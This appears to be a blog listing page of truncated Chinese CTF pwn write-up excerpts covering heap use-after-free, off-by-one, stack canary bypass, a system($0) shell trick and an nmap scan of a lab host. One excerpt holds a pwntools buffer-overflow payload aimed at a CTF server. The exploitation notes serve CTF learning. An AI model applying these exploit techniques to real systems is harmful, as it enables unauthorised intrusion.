[HNCTF 2022 WEEK4]ezheap [*] '/home/bamuwe/ezheap/ezheap' Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled ...

[BUUCTF]hitcontraining_heapcreator UAF Off-By-One 堆溢出 对应libc版本libc6_2.23-0ubuntu9_amd64 [*] '/home/bamuwe/heapcreator/heapcreator' Arch: amd64-64-litt...

所谓UAF漏洞是指程序在运行时通过悬空指针(悬空指针是指仍然指向已被释放内存空间的指针)访问已经被释放的内存. bamuwe@bamuwe:~/YDSneedGirlfriend$ ldd girlfriend linux-vdso.so.1 (0x00007ffd09fec000) /home/bamuwe/pwn_tools/glibc-all-in-o...

bamuwe@bamuwe:~/palu$ checksec Palu [*] '/home/bamuwe/palu/Palu' Arch: amd64-64-little RELRO: No RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x400...

[*] '/home/bamuwe/ez_uaf/ez_uaf' Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled $ checksec ./ez_uaf Easy...

shell的特殊姿势 看上去很简单的栈溢出,但是问题在于找不到能用的/bin/sh或者sh 这里出现了一个shell的新姿势:可以利用system($0)获得shell权限，$0在机器码中为 \x24\x30 在tips函数中正好有 \x24\x30可以用来构造,所以需要取出0x400541 关于ida打开机器码:Option->general->Number ...

NSSCTF_pwn_刷题笔记page(1) [SWPUCTF 2021 新生赛]gift_pwn from pwn import * io = remote('node4.anna.nssctf.cn',28991) padding = 16+8 shell = 0x4005B6 payload = b'A'*padding+p64(shell) io.sendline(payloa...

主机发现 192.168.30.133 信息收集 └─$ nmap -sV -A 192.168.30.133 Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-22 03:26 EST Nmap scan report for 192.168.30.133 Host is up (0.0013s latency). Not sho...

Canary 保护 程序控制流 64位libc泄露 bamuwe@bamuwe:~/done/others_babystack$ checksec babystack [*] '/home/bamuwe/done/others_babystack/babystack' Arch: amd64-64-little RELRO: Full RELRO ...

bamuwe@bamuwe:~$ file quasar quasar: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=00a219f57c37379e9a7d16a82edc...